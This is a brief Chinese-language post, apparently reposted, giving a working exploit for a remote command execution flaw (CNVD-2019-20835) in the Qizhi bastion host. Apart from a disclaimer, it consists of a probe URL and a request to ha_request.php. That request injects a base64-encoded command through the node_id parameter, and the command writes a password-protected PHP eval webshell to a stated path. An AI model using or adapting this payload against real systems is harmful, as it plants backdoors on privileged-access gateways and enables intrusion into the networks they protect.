齊治堡壘機 遠程命令執行漏洞[CNVD-2019-20835]


請遵守網絡安全法!!!本文僅供學習交流使用!用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關!讀者自行承擔其惡果!

利用過程

訪問http://127.0.0.1/listener/cluster_manage.php 返回 "OK"

訪問如下鏈接即可getshell,執行成功后,生成PHP一句話馬
一句話馬路徑/var/www/shterm/resources/qrcode/lbj77.php  密碼10086

https://127.0.0.1/ha_request.php?action=install&ipaddr=127.0.0.1&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM